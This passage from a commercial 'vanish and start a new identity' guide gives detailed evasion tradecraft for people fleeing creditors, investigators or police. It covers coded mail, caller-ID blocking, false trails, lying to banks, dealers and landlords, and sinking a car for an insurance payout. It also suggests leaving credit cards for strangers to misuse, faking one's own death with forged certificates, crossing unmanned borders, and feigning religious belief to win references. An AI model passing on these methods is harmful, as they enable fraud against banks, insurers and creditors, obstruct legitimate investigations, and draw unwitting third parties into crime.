that every day +of the week postal officials turn over tons of mail to various +government agencies that DO open your mail. Don’t trust the +mails! If you must communicate by letter, use mail drops and +use code words or phrases. +If you want to report whether or not something took place - +make up a code that anyone reading the letter would never +be able to figure out. If you mention your Aunt Jane - that +means the task was completed as planned, while a mention +of your Uncle Arthur means something went wrong. It’s sad +fact that we live in a country where the government snoops +on it’s own citizens. (And don't be deluded into thinking that +the government has to bother with obtaining search warrants +or court orders to read your mail or listen in on your phone +conversations. The so-called national security administration +( NSA ) listens in to millions of domestic phone calls every +day under it's "Echelon" program!) +If you’re attempting to escape an ex-lover or spouse, resist +the temptation to call and taunt them. As much as you might +enjoy it, "caller ID" is everywhere these days and phone +company records are an open book to an attorney, an +investigator or a cop. After your first call, your target can now +call the phone company and report they've been receiving +obscene phone calls. The phone company will then monitor +your target's line and report your number to the police for +investigation. +When the detectives on TV or in the movies are looking for a +connection between the victim and a suspect, they always +turn to the phone records. ("Usage Details") If you must +phone home at least use a pay phone in a town as far as +possible from your real location, keep the call short, use one +of those pre-paid long distant cards (which you, of course, +purchased for cash) and don’t make a second call. +Here's a little piece of information you just might find +interesting. Those nice folks down at Radio Shack and +others sell a device called a "Caller ID Blocker". You plug +this small plastic device between your phone and the +connector on the wall. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 296 - +Reproduction in any form is prohibited without written permission. + +When you make an outgoing call this little wonder blocks +caller ID so that no one can determine your phone number. +Just be sure to pay in cash and decline to give the sales +clerk any information when he asks. When he asks for your +last name, just say "cash". That will usually take care of it. +Now that we’ve covered the basics, let’s move on to some +actual planning. +Pre-move Planning +Successful identity changing demands careful planning and +flawless execution. Anyone who attempts to change +identities with a casual attitude or goes at it too quickly is +doomed to failure. This all takes time, effort and courage to +break away from whatever pleasure and support you might +presently be enjoying. +The first priorities are to obtain new identity documents and +accumulate as large a cash grubstake as possible. Once you +have your new drivers license, find one of those "secured +credit card" banks. You put up some cash, usually a +minimum of $200 or so which goes into an interest-bearing +savings account. +They then issue you a genuine Visa or MasterCard credit +card with a credit limit secured by the savings account. +Some banks do a credit check while others don't bother but +either way they'll accept almost anyone. +You don’t get much credit but it does provide you with a +genuine bank credit card in your new name in less than a +month. When you go looking for living quarters, it will make +you look much more trustworthy and reliable. +And it’s an excellent form of ID. Without a major credit card, +you’re really lost out there. During a recent job interview one +lady was asked if she had bank credit cards, when she +showed the interviewer two - she was quickly hired. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 297 - +Reproduction in any form is prohibited without written permission. + +Here’s a list of banks that issue secured credit cards: +Phone Minimum +Bank/Firm +Number Deposit +Chevy 1-800-937- +$300 +Chase 5000 Ext. 99 +1-800-470- +Best Bank $250 +6111 +Community 1-800-779- +$300 +Bank 8472 +Bank of 1-800-243- +$500 +America 7762 +Orchard 1-800-688- +$200 +Bank 6830 +First +1-800-658- +National $250 +3660 +Bank +Bank One 1-800-945- +$500 +of Arizona 2000 +Chase 1-800-482- +$300 +Manhattan 4273 +Federal 1-800-290- +$250 +Savings 9060 +Cross +1-800-262- +Country $200 +3610 +Bank +First 1-800-876- +$100 +Consumers 3262 +Hello Sailor! +Then there’s the "tramp steamer" approach. For a very +reasonable fee you can book a long cruise on various cargo +vessels. They wander all over the globe. The +accommodations are not all that fancy but you will be well +fed and at the same time - well lost. No one will be able to +find you for a number of months. +And if you can afford to, you may want to stop somewhere +and spend a few months. If you have the bread, the south of +France is a favorite destination for exiled kings and fallen +dictators. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 298 - +Reproduction in any form is prohibited without written permission. + +For a century or more the locals have learned not to ask too +many questions. Instead they tend to focus on the color of +your money. +When you’ve settled on your new home city, remember what +I told you about keeping your mouth shut. Back during the +cold war the Russians were fond of spreading "mis- +information". It was one of their favorite tactics and for good +reason. +It’s a good tactic that you should use too. While keeping +absolutely quiet about your real destination, start +broadcasting your interest in living in some remote location +(the Indians call this "leaving a false trail"). +Spread the word to friends, co-workers and anyone that +might later be approached by an investigator. +For example, if you’ve settled on moving to Phoenix, start +telling your friends about how much you’ve heard about +South Carolina. Of course you "have friends in South +Carolina" who you’d would like to visit. Let them know that, +come your next vacation or long holiday weekend, you’re +going to fly out to good old South Carolina. If you’re a good +actor you might even drop a comment like "if I like it there, +who knows - I might just stay!" +The really smart identity-changers will bolster their future +safety by actually flying out to the city they told their friends +they were interested in (buying the ticket with a current credit +card) and performing several ATM and credit card +transactions while there. You might send a postcard home or +better yet, a letter to your closest friend or relative. This all +beefs up the "cover story" and creates an obvious paper trail +that will later send an investigator off on a wild goose chase +in the wrong direction. Let the poor bastard beat his brains +out trying to find you in South Carolina while you bask in the +Arizona sun! +Open a Checking Account +Be sure to use a different bank than you used back home. +Major banks that used to limit their territory to the inner city +and suburbs of a single city, now have branches all over a +state or even beyond. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 299 - +Reproduction in any form is prohibited without written permission. + +Small banks are the best bet as they are less likely to spread +your personal information around. Stay away from the major +regional banks. Take as much cash as you can afford with +you to deposit. +A grand or more would be best. It will impress the clerk and +smooth the application process. Banks like to take in money. +Do not deposit any checks that would in any way link this +new account to your old bank account, name or city. Dress +and act appropriately as all this cash would look very +suspicious in the hands of someone who looked like they +just might be a drug dealer. +If they ask for the name of your last bank and your old +account number just tell them that you had an account in the +"Saudi National Bank" in Jidda, Saudia Arabia. +That should kill any idea they have of running a verification +check. Banks in the Arab world go by the European rules, +which means they only release account information after a +recognized court has issued an official search warrant. +Getting an Apartment +You might be able to locate an individual apartment with a +little bit of luck. Most decent apartment complexes are +managed by large firms who are very suspicious of +applicants who are new to their town. They will insist on +running a rather deep background credit check and will want +to verify your employment. +They will also ask to talk with your current landlord. If you tell +them that you’ve been living with your parents for several +years following a bad divorce, they may let you lease an +apartment, though they may demand several months extra +deposit due to your lack of verifiable rental history. If your +credit is shot, you will either be refused or they may insist on +a really punishing security deposit of up to two grand. +It all depends on the rental market. If they need your +business they’ll bend over backwards to get you into one of +their units, providing you look reputable. If their occupancy +rate is approaching 100%, you’ll probably have a very tough +time. Check it out for yourself. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 300 - +Reproduction in any form is prohibited without written permission. + +Again, the better working class neighborhoods are best. +Avoid the really poor areas as slumlords there tend to be the +most demanding when it comes to background checks. +Another advantage of the shared home approach is that you +don’t have to deal with the utility companies whose records +are open books. Getting electricity and a phone connected +will set you back quite a bit in deposits since you have no +established credit or verifiable utility history. +This lack of history will raise a giant red flat with any utility +company. They're afraid that you won't stick around to pay +your bills. When you ask about the rent in a sharing +situation, they usually say something like "$400 a month plus +half the utilities and all your long distance phone calls". +And because investigators use utility records to locate +people, the shared approach allows you to live invisibly, with +your name not appearing on any utility records. Talk about +being low-profile! Living as a roommate is zero-profile. +Are You a Real Beauty? +A note here about attractive women. If you are a woman +under age 45 or so, with average or above average looks, +you have a special advantage here. Did you know that there +is only one type of fugitive that bounty hunters won’t bother +looking for. They won't lift a finger to search for attractive +young women. +Why? Because an attractive woman can breeze into any +good sized town, crawl into a singles bar and quickly locate +a guy to "shack up" with. A shacked up woman is, in effect, +invisible from a public records standpoint. The lease and all +of the utilities are in the guy’s name. +She continues to drive on her out of state drivers license, so +unless she’s stupid enough to go and get a new drivers +license, the local DMV has no idea where she is. It’s as if +she dropped off the face of the earth! Unless she makes a +mistake, she’ll never be found. +Also an attractive woman who needs to change her name +quickly can simply get married which makes her much more +difficult to find. It’s a bit more difficult for men. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 301 - +Reproduction in any form is prohibited without written permission. + +Your Personal Story +Get your new "life story" squared away. Take a pad and pen +and write it all down. Read it aloud until it sounds good. +Embellish it but not too much. Don’t get carried away. Don't +try to claim you were a surgeon unless you can talk the talk +like a real doctor. +Try to anticipate any obvious questions. With some effort the +pieces will all fall into place. If you’re moderately bright you +should be able to ad-lib any other answers. Then get it all +straight in your head. Repeat it all until you’re comfortable +with it. +Should someone ask about your divorce or some other area +of your past you would rather not have to explain, you can +always indicate that the subject is still painful by saying "I’d +rather not talk about it". +Most people will back off and not bring it up again anytime +soon. Over time a strange thing will start to happen. You’ll +actually start to believe your new life story. After a year or so +it will fit you like a glove and you’ll have to strain to +remember the actual life you left behind. It may sound +strange but if you've never actually done it, but by living a +new life you can become an entirely new person. +Ever read about brutal nazi murderers who slaughtered +thousands of innocent people and then came to the US after +the war and lived perfect lives thereafter. You wouldn't think +it possible but it's happened many times. +The "Funeral Trap" +This one is tough. If you want to protect your new identity, +you'll be unable to attend the funeral of a loved one that dies. +Law enforcement types make it a point to visit funerals in +search of fugitives. Many ex-spouses have been nabbed +when they came to pay their last respects to a deceased +parent. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 302 - +Reproduction in any form is prohibited without written permission. + +And you'll need to give some thought to who you want to +handle the funeral arrangements. You simply cannot +become involved. To do so would require you're returning to +your old hometown and attempting to pay for funeral +expenses with cash, which would be very unusual. Many +wanted fugitives overcome with grief will throw caution to the +winds, put on a nice dark suit and dutifully show up at the +funeral only to be spirited away as soon as they step out of +their car. You simply can't assume that such a sad and +somber occasion is safe. +Even sending flowers can be dangerous (if you bought them +with your credit card which is a common practice these +days). +Please fill out the registration card +I once knew a nice lady who was, how can I say this, not all +that smart. When a co-worker offered to sell her a brand new +color TV for half it's retail price she quickly snapped it up. +The seller told her with a wink "it fell off the back of a truck!". +She just giggled. +After the set arrived, she was sitting there reading the +owner's manual when a bright yellow postcard fell out onto +the floor. It was a registration form that promised that if she +registered her purchase with the manufacturer, she might +win a new car. She filled in the card and mailed it off the next +morning when she got to work. +Six weeks later two cops appeared at her door. Not only did +they confiscate the stolen TV, but they also took her down to +the police station where they interrogated her until she broke +down and told them who sold her the hot set. He got five to +seven years. +Do not take any appliances with you that are registered with +the manufacturer. If you buy new ones, promptly throw away +any registration cards. These databases are now available to +various types of investigators. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 303 - +Reproduction in any form is prohibited without written permission. + +When you take an appliance to a repair depot, they routinely +run the serial number through their database (many states +now require this serial number tracking by law - IBM pushed +for this legislation years ago when they discovered they +could locate stolen IBM typewriters by monitoring those +brought into their authorized service centers). +It would really be a shame to have your VCR blow your +cover! +Getting Rid of Your Car +There are several ways to shed your old wheels. By far the +simplest is to sell it privately for cash. Run a small ad in the +paper or in one of those tabloid style rags that are dedicated +entirely to cars. If you can afford to take your time, you can +go for the highest price possible. +Don’t be shocked if some teenager offers you much more +than you know it’s worth. These things happen. Take +advantage of the situation. Be aware that teenage boys +usually have a lot of problems coming up with the cash. Plan +to allow enough time so that you can take your time. If +anyone asks why you’re selling the car - tell them that you’re +going to work overseas (in Saudi Arabia) where your new +employer (ARAMCO Oil) will be providing a vehicle. +If you want to avoid leaving the impression that you’re +planning to skip town you might want to consider some other +alternative ways of ridding yourself of your auto. One guy I +know drove his car into a sleazy inner-city area at night (with +a friend following close behind). He parked the old buggy on +a dark side street. He then abandoned the car leaving the +doors unlocked and the keys in the ignition. +They drove past it one hour later and the car was already +gone. It didn’t take long. It was probably stripped for parts in +a local chop-shop particularly if it was a 3-5 year old Ford or +General Motors product. (these are the models most often +stolen in the inner city as there is a huge demand for their +parts there) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 304 - +Reproduction in any form is prohibited without written permission. + +In the cities along the great lakes and Mississippi river, it’s +long been a popular ploy to drive down to a pier along the +water, get out, drop a brick on the gas pedal, reach in and +drop it into gear. +Off it goes into the watery depths, never to be found again. +The insurance company pays and never manages to solve +the case. +If you’re in a big rush you can usually sell your car to a +dealer but don’t expect top dollar. You’ll probably get about +two-thirds of what it’s worth but at least you’ll get a quick +check which you can then take to the dealer’s bank and cash +for - you guessed it - cash. +How to Buy a Car +Go to one of those shifty "we sell to anyone" - "bad credit no +problem" car lots. They don’t do a lot of in-depth checking of +references as they plan to re-possess the car the first time +you’re a day late with a payment. They’ll also charge you the +legal limit on the interest. That’s their racket. +But if you keep up your payments, you build good credit +AND have a set of wheels. Be careful though, as these +sleazy dealers tend to sell junky unreliable cars at extremely +high prices. Be as choosy as you can. You want reliable +transportation and at the same time you want a car that is +not too similar to your old buggy. +If you buy a used car privately, be sure to ask the seller if it’s +OK for you to borrow his tags for a day or two so you can go +and get the title switched and get your new tags. Unless the +seller is a jerk this should be no problem. +Car insurance can get tricky here. If you buy from a large +new car dealer you won’t have a problem. They will be so +eager for the sale they won’t care about checking on your +insurance. They’ll ask which company you’re with and then +write down your answer. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 305 - +Reproduction in any form is prohibited without written permission. + +But, if you happen to live in a state that requires insurance in +order to qualify for the issuance of auto tags, tell the dealer +that you just returned from working overseas (Saudi Arabia) +and drove company vehicles over there so you haven’t had +insurance in the U.S. for many years. An insurance man +would see right through you but the car salesman only wants +to get the deal signed and sealed. +He’ll arrange for an insurance salesman to come to the +dealership and sell you some nearly worthless insurance +that will satisfy the law but will probably never pay you if you +file a claim. And, as you’re in a jam here, you’ll be required +to pay premium prices for it in advance. If you have to, pay +up as it’s the only way. +Or if you’re in one of those states where they allow +insurance companies to sell cheap worthless auto policies +(Florida has this ridiculous system), you’re in luck. +You can wander in and pick up an entirely worthless policy +for under a hundred bucks which will legally qualify you for +the tags. Ask your salesman, he’ll work it out I’m sure. +Remember, all he has on his mind is his sales commission. +No matter how long it’s taken to prepare your new life, the +moment you sell your old car and climb into the new one is +the moment you will become that new person. The car is the +key to a new you! +Killing Off Your Old Identity +The "Flying Saucer" Strategy +The goal here is to leave behind a complete dead end. +Slowly but steadily drain your checking account until the +balance goes below $100. Then just abandon the money. +Throw away your ATM card. Bring all your bills current. +Destroy your credit cards. +This is going to hurt but a single credit card purchase in your +new location will quickly bring investigators right to your +doorstep. Leave your subscriptions to lapse. File a change of +address postcard that forwards all your mail to some hotel in +another region of the country. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 306 - +Reproduction in any form is prohibited without written permission. + +Alaska is a favorite as it has many tourist hotels to choose +from. Sniff around the web and you'll find dozens of Alaskan +hotels that would be perfect for your purposes. +This way no mail will be returned to your creditors AND any +investigation of your movements would send the skip-tracer +off on a dead-end search of the frozen Klondike. +A few notes on how skip-tracers and other investigators +work. If you owe money, your creditor will be dunning you +with a constant stream of collection letters and phone calls. +One or both of the following events trigger most skip-trace +investigations. +The creditor firm gets a collection letter returned by the post +office labeled as "undeliverable - addressee has moved - No +forwarding address on file" (which means you moved without +leaving a forwarding address) or your phone is disconnected +when they call. +This is usually the result of not paying the phone bill or your +having had the service terminated. Either way, your creditor +will know that the hunt is on and will promptly release the +hounds! +But if you overpay your phone bill and include a note stating +that due to an illness in the family you’ll be out of town for +several months and want your phone service to continue +uninterrupted, those nice people down at the phone +company will keep your phone going until the funds run out +which could be many, many months. +And with your mail forwarded, they’ll never get any mail +returned. (They will however get a notification of the address +change if they request it) +I call this the "Flying Saucer strategy" because the result is +just as though a flying saucer dropped down from the sky, +beamed you up and spirited you away. Nothing remains. +Your former life is there for all to see, but where are you? +This is by far the best way to go but can only really be used +if you have the funds to pull it off and don’t have anyone on +your trail. An investigator will review your case, make a few +calls and conclude that you had "no reason for flight." +© Copyright 2011, Ariza Research, All rights reserved - ABP - 307 - +Reproduction in any form is prohibited without written permission. + +The balance remaining in your bank account will convince +any investigator that you probably didn't intend to cut and +run. +The "African Safari" Strategy +You suddenly develop an intense interest in the Dark +Continent. You let all your friends know. As the story goes, +you recently met someone who went on a safari in Nairobi, +Kenya. It was just great being out there with all those +beautiful giraffes, rhinoceroses and exotic birds. It’s always +been your dream to go there. If you have vacation time on +the books, announce that you’re going to take the plunge +and make the trip of a lifetime to beautiful Africa. +Call a travel agency and buy the cheapest ticket to Nairobi, +Kenya you can find. Be sure to pay with your credit card. +Buy a return trip ticket (if you can afford to) Again, let all your +friends know how excited you are about your upcoming trip. +Maybe you can go out and buy a camera for the trip or even +a fancy hat just like the ones the big game hunters wear. +Apply for a visa from the Kenyan embassy in Washington if +you want to go all the way. Show your friends the visa. +You’ll probably have to wait six or eight weeks for your +departure (sooner departures tend to be rather expensive). +But when the big day comes you drive out to the airport with +your camera bag and hat. You stand in line to get your +boarding pass, check one bag. (Which contains some old +clothes you no longer need) +You ask which way to the gate and off you go in that general +direction. When you get to that side of the concourse you +duck into the bar, pocket the boarding pass and wait for your +plane to depart. +You then tuck the hat into a bag and return to the parking lot +where you climb into your car and head off to your new life. +Or you can just fly out of that same airport to some other +destination on a ticket purchased in an assumed name with +cash. +Don’t even think about trying to cash in the ticket to Africa. If you +do the whole effect will be spoiled. It’s important that you leave +your apartment looking as though you were only gone for a few +weeks vacation. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 308 - +Reproduction in any form is prohibited without written permission. + +If the television and VCR are gone, investigators may conclude +that you have taken flight and will start looking for you in earnest. +(If you're really attached to your TV, you might purchase an older +used unit and leave it behind) +This strategy is not cheap, but it is effective. Anyone, and I +include here both experienced investigators and the law; will +draw a blank on this one if it’s done carefully. Sure it costs +quite a bit more than simply walking away, but for the money +you leave behind a stone cold dead-end trail that ends +somewhere in the jungles of Africa! What does the +investigator do when he confirms that you picked up your +boarding pass, checked a bag and that the ticket was one +way? +Where does he go from there? If he goes to the considerable +trouble of actually talking to the clerk who handled your +departure, she'll report that you were there and obtained +your boarding pass. From there it’s a total dead end. +Even if he suspects that the whole thing is a ruse, he’ll +attempt to verify your arrival in Kenya. After some months of +correspondence he’ll probably discover that you didn’t arrive. +But since the plane stopped in London and/or Athens +enroute you might have deplaned there and since England +and Greece don’t require visas, he’ll have nowhere left to +look. Those long distant overseas phone calls can be +expensive and an investigator can’t expect the same level of +cooperation from foreign officials that he can here in the US. +As a last touch, leave behind a nice color picture book of +Africa in your top desk drawer where someone is sure to find +it. Place another on your apartment coffee table. This plan +will work perfectly, provided you don’t do anything stupid +thereafter. +The "Wild Goose-chase Through the Ghetto" Strategy +On the eve of your departure, take your wallet, complete with +old drivers license, credit cards and a little cash and just +drop it in the middle of the street at midnight in front of a +sleazy nightclub in the shabbiest part of town you can find. +Trust me - someone will find it and use the credit cards or +sell them to someone who will. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 309 - +Reproduction in any form is prohibited without written permission. + +Anyone trying to find you will then be sent on a real "wild +goose chase". He’ll see lots of scattered credit card activity +but it won’t lead him to you - that’s for sure. While he’s trying +to make sense of it all, you’ll be off to a new life in a distant +city. +Or you can shed both your old identity and your old car at +the same time. Park your car along a ghetto street at night, +leave the driverside door unlocked, the keys in the ignition +AND leave your wallet on the front seat. You’ll be killing two +birds with one stone. There's always on thing you can +depend on in this life, the greed of your fellow man. +The "Kill Yourself Off " Strategy +Now we move on to the really illegal stuff. This tactic is +against the law so - don't do it! I can almost guarantee you +that you’ll end up in jail should you try this particular ploy. +One lady called her local paper, posed as her own sister and +placed an obit on herself! When they asked for the funeral +home that would be handling the "showing" she said that, as +requested in her will, she was cremated and that no funeral +would occur. Since she died "after a long illness", she +included a note in the obit that contributions should be made +to the U.S. Cancer Society. +She then walked into a large hospital and asked where she +could get a death certificate. When she got to the right +person she just asked for one on the pretext that her mother +had died in a rural area and the police needed a copy for +their records. +Although it’s a minor crime to provide the blank form, the +clerk handed one over without question (I’ve known several +people who’ve successfully obtained blank death certificates +this way despite the legal restrictions). +She then filed a fake death certificate on herself (another +illegal act) and then used the death certificate to file for a +claim for her death benefit with the Social Security +Administration (a federal felony), which got her entered into +the publicly available social security death database. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 310 - +Reproduction in any form is prohibited without written permission. + +On paper she was then completely dead. Her husband +collected a cool $100,000 from their life insurance (yet +another illegal act which took over two years as they had no +dead body). The insurance company was suspicious, but +since the public image of the insurance industry is of prime +importance, they eventually paid in full. +She left behind a ton of debt that evaporated when her +creditors discovered that her estate was penniless. She and +her husband met several times a year in the Caribbean and +during one of those visits, they were both arrested. This +approach constitutes a series of federal felonies, which +almost always results in a long jail sentence. +Here’s one obvious strategy that is guaranteed to fail. +Insurance investigators always have a good laugh when +someone fakes jumping off a bridge. They leave behind their +car, a wallet and a suicide note. Problem is, less than a +quarter of alleged jumpers actually die and leave a dead +body behind. Don’t expect anyone to believe such a story. +And be assured that your life insurance will never pay off on +such a claim. +The "Canadian Crossing" Strategy +You charge an airline ticket to Canada on your credit card in +your old name and fly on up to Toronto or Montreal. Check +into a hotel and take a look around (it’s a lovely country!) and +then rent or buy a car in your new name, which you then +drive back across the border somewhere out west where the +border is very poorly manned. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 311 - +Reproduction in any form is prohibited without written permission. + +You should be able to just drive across at one of the +unprotected crossings on the smaller back roads. The +Montana/Canada border is a good area for this. You might +have to stop and show your driver’s license to a Canadian +Mounty. Either way nothing gets entered in a computer so +you were never there as far as an investigator is concerned. +Take your birth certificate with you just in case but don't offer +it unless asked. Most of the time they won't bother to ask if +you sound like an American and are dressed well. +You only have about 2,500 miles of border to choose from. +This strategy works best during the legal hunting season +when hundreds of eager hunters cross back and forth into +and out of Canada from the adjoining US states. This way +you go on the record as having gone to Canada but no +record exists of your return. You come back "laundered" and +ready for a new life. Anyone attempting to track your +movements will be left wondering when you'll come back +from Canada! +I’ve also heard of some who have hitch-hiked across with no +problems. One guy posing as a nature photographer caught +a lift from a friendly hunter who didn’t relish driving back to +Detroit alone. +Just remember to dress the part. You want to look straight +and clean cut. If you're young, have long hair or drive a +wreck of a car be prepared to be stopped and even +searched. If you’re crossing during hunting season, dress +like a hunter. During other seasons you’ll want to dress in a +suit and tie and be sure the car is spotless inside and out. +The make and model of your car can get you stopped. +Large US made cars are suspect because their trunks are +large and are popular with drug smugglers. (have you ever +seen the trunk on a Ford LTD - it’s really huge!) +A late model foreign car will do nicely, or better yet a rental +car is perfect though they can be very expensive when you +drive them one way because the rental firms charge a very +hefty "drop off charge" for rentals that aren't returned to the +original site. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 312 - +Reproduction in any form is prohibited without written permission. + +If you’re black or Hispanic your odds of being searched +skyrocket especially if you're younger. You can reduce the +odds somewhat by having a wife and small child with you. +Here is a common ploy used by Americans that work +overseas. +According to US tax regulations; overseas workers pay no +US federal taxes on the first $70,000 they earn overseas +provided they do not spend more than 100 days per year +visiting the United States. So they fly from their overseas +worksite to Toronto on their passport and then cross the +border into the US using only their driver’s license as proof +of citizenship. When they desire to return overseas they +reverse the process and fly out of Toronto using their +passport. +Anyone inspecting their passport will discover that they +spent several months in Toronto and nothing more. They +spend as long as they like in the US and protect their income +from taxes at the same time! I don’t expect this situation to +change anytime soon as the Canadian border (unlike the +Mexican border) is of little interest to either government. +The "Overseas Worker" Ploy +You’ll find ads in the larger city newspapers offering to find +you work overseas. They mostly offer professional caliber +positions for engineers and doctors. But some are on the +lookout for English instructors for contract positions in the +Far East and particularly Japan. If you’re adventuresome this +might be just the ticket. It gets you out of the country for two +years or longer. +You’ll be required to sign a contract and may be required to +submit to a complete physical exam with their physician. Be +sure that you intend to stay overseas for the full period of the +contract as an early return may be very expensive. Most of +these contracts include painful penalties for breaking the +contract by returning early. +One note though. Don’t pay an up-front fee to any of these +so-called employment agencies. Many are notorious rip-off +artists. Find the ads that just offer listings of the jobs +available. And if the position requires a degree, call them +anyway. They may be shorthanded - you never know. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 313 - +Reproduction in any form is prohibited without written permission. + +Saudi Arabia hires a wide range of instructors. If you have +experience working in a sheet metal shop, doing auto +bodywork, have done any kind of aviation mechanical work +or know how to install phones you may be able to find a +lucrative position teaching our Saudi friends. Saudi Arabia is +a nice enough place to live and work. +The pay is great but don’t bother going there if you love +booze or movies. Both are against the law there. (That +doesn't mean you can't get them, it only means it's more +difficult and more expensive) There’s some booze around +but not all that much as booze is technically illegal in Saudi +Arabia. Don’t even think about trying to smuggle booze or +drugs into Saudi Arabia. +While the Saudis tend to be a bit more liberal when it comes +to enforcing their strict laws in the areas where Americans +live, they tend to be really strict about drugs and the +penalties they hand out are really frightening (how would you +like to have your hand cut off?) +Most of these overseas job locator services will have a +number of listing for teachers to teach foreigners the English +language. Some will require a college degree in English but +many won't. If you're well spoken you should be able to find +a job somewhere out there. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 314 - +Reproduction in any form is prohibited without written permission. + +The "Cult Membership" Strategy +Browse around the Internet and you’ll find many religious +cults who have web pages designed to convert people to +their way of looking at things. If you live in the east, find one +out west. If you live out west, find one back east. Get as +much info as you can about the cult. +You want a real cult. One that is secretive and strange but +not actually dangerous. Send away for information. +You can tell your friends and co-workers that you’re going to +join +up. Or if you can handle the experience, you might want to +actually join up, get a membership card and the whole +works. Then tell all your friends that you’ve found "the +meaning of life". They’ll think you’re nuts but who cares? Tell +everyone about how you’re going to visit your new cult +friends for a brief visit. Go ahead and tell them where the cult +is located. +You go and you don’t come back. In fact, you spend a day or +two with your new fellow cult members and then split for +parts unknown under your new identity. Anyone looking for +you will easily track you to the cult but that will be the end of +the line as no further information will be available. +Cults are notorious for not revealing anything - unless +ordered to by a court and even then they will have their +lawyers legally challenge the court order. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 315 - +Reproduction in any form is prohibited without written permission. + +No one short of a cop with a search warrant will be able to +find out if you are actually there or not. And even then they’ll +probably have to fight the cult in court before they get +access. +Also, some cults are famous for regularly moving all over the +country in an effort to evade investigation and/or media +attention. Every cop knows that some cults will move the +target member before the cops return. It maybe illegal but it’s +a common ploy with these outfits. +I know two people who actually joined the Scientology cult in +an effort to vanish. One warning, the Scientology people can +be quite dangerous so this particular cult should not be +played with. But you can visit them, join and then split +though they’ll try very hard to get you back. +But if you travel under you new name after you leave they’ll +never find you. If you let the Scientologists know your new +name, they will pursue you forever. +For that reason you should join them under your old name +and never reveal your intention to split to anyone in the cult. +You can be sure they will be watching you carefully and +monitoring your attitude so you'll have to very clever. Just +convince them that everything is fine and then pick your +moment and vanish. +Investigators and skip tracers know that there’s little use in +contacting a real cult. +Their inquires will be ignored and they know that if they +become insistent or threatening, the cult’s attorney will step +in. And cults can often afford the best legal talent available +so legal threats are of little use. +Besides most genuine cults have stripped their members of +any and all wealth they may have had when they signed +up. So if you're not sure you can withstand their +psychological brainwashing - stay away. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 316 - +Reproduction in any form is prohibited without written permission. + +Run Off and Join the Circus +Perhaps when you were younger you had a dream about +running off with the circus. Well now might be just the time to +re-visit that childhood dream. An old friend recently reminded +me that anyone seeking to vanish ought to take a look at the +"amusements" industry. +Every year at the same time (usually sometime in the +summer) you’ll notice various "amusement" companies that +breeze into town, set up a smallish fair which they run for a +week or so and then move onto the next town. +These outfits almost always need laborers and electricians +to help with the setup and tear-down. They usually run a +small classified ad in a local paper. The best tactic is to show +up during the last day of their operation, ask to see the boss +and ask if they need help with their "teardown". If they hire +you, work hard and don’t complain. When they pay you off, +ask if they might need another hand out on the road. +You can tell them that due to the recent death of your +spouse you’re free to travel. +The job they may offer might be that of a "ride monkey". You +help with the setup and teardown and also man one of the +many rides. +A warning: this is not an easy life. Some of these companies +will pay to put you up in a local motel complete with a private +bath and air conditioning. But others will require that you +sleep in an un-air-conditioned trailer with only a shared +mobile shower/restroom. It’s kinda like camping out all +summer. If you’re really attached to a luxurious lifestyle, the +"carny" life may not be for you! +But one thing I can guarantee. You will be properly and +completely lost for the summer. No one will be able to find +you no matter how hard they look. +Many of these companies don’t ask questions of their +employees. Many pay their people in cash so you can be +sure you’ll be rubbing shoulders with other freedom-loving +souls. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 317 - +Reproduction in any form is prohibited without written permission. + +Most will ask your name and then write it down without any +reference to identity papers. The pay may not all that great +either as they know that you need this kind of work and so +are less than generous. +Magazine Subscriptions +If you scout around any major newspaper's want ads you +may find some jobs listed under "Magazine Subscription +Sales". These companies hire supervisors who travel the +country in a stretch van with a small crew of teenagers who +sell magazine subscriptions door to door. +Be warned however that some of these outfits are out and +out scams. They use these wholesome looking kids to sell +subscriptions (or some other useless product) under the +guise that the youth is selling magazines so they can go to +college, for some innocent sounding religious organization or +for a famous charity (usually one that benefits poor or sick +children). +The hours are long, there are plenty of hassles (this whole +approach is becoming less and less viable given some +recent media attention) but the income can be very good and +you will be roaming the entire country so finding you will +present quite a challenge. Once again, these employers +know that the kind of people this industry attracts aren't the +cream of the crop. Many pay their staff people in cash and +won't even bother to ask for identity documents. +This might be just the job you need if you can find an honest +company and can put up with the inevitable problems that go +along with managing a group of teenagers. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 318 - +Reproduction in any form is prohibited without written permission. + +Your Appearance +Here are some aspects of your appearance that can +substantially alter your overall appearance: +Gain or lose weight (very effective) +Changing your hair color (effective) +Changing your eye color with contact +lenses (subtle) +Changing your hair length (effective) +Covering up baldness with a "rug" (very +effective) +Adding or removing tattoos (very +effective if visible when fully clothed) +Plastic surgery (if you can afford it - +extremely effective) +Establishing Yourself in Your New Community +There are those who feel that upon arrival in a new +community an identity-changer should immediately get in +contact with an underground group of some sort. Over the +last few years the papers have carried stories of fugitives +being arrested after showing up at one of these supposedly +clandestine meetings. +The sad truth is that either the local police has penetrated +most of these groups or, if the government feels they warrant +the attention, the FBI itself has moved in. You don’t know +these people. Why should you trust them with your future? +There’s a better way. One that keeps your story private. +By far the quickest way to establish yourself in a new +community is to join a church. The best bet would be to join +one of those hellfire-and-brimstone "born again" Baptist +congregations. Find a medium to small church with a lot of +younger families. If you’re like me you can’t stand these +idiots, but you only need to attend for a few Sundays, chum +up to several of the parishioners and you’ll quickly have +several impressive personal "references" for immediate use. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 319 - +Reproduction in any form is prohibited without written permission. + +The game here is to pretend to believe exactly as they do. +Listen carefully during their services. Every church has it's +very own interpretation of just what "real" religion is +supposed to be. What do they concentrate on? Try to +identify 